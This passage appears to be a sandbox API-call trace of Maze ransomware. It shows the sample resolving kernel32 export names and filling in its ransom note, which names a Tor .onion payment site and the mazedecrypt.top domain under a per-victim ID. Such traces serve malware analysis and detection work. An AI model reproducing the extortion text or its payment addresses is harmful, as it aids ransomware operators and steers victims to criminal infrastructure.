lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.524] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.524] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.524] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.524] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.524] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.524] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.524] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.524] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.524] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.524] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.524] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.524] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.524] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.524] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.524] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.524] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.524] lstrcpyA (in: lpString1=0x239db58, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.525] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%USERID%") returned="%USERID%\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0178.525] VirtualAlloc (lpAddress=0x0, dwSize=0x100e, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000 [0178.525] lstrcpynW (in: lpString1=0x5d0000, lpString2="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", iMaxLength=925 | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/" [0178.525] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/", lpString2="9cda09f29c354b42" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42" [0178.525] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42", lpString2="\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0178.525] lstrlenW (lpString="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned 2045 [0178.525] lstrlenW (lpString="9cda09f29c354b42") returned 16 [0178.525] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%USERID%") returned="%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0178.525] VirtualAlloc (lpAddress=0x0, dwSize=0x101e, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0178.526] lstrcpynW (in: lpString1=0x5e0000, lpString2="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", iMaxLength=1100 | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/" [0178.526] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/", lpString2="9cda09f29c354b42" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42" [0178.526] lstrlenA (lpString="kernel32.dll") returned 12 [0178.526] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.526] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.526] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.526] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.526] lstrlenA (lpString="ADDATOMA") returned 8 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.526] lstrlenA (lpString="ADDATOMW") returned 8 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.526] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AddConsoleAliasW" | 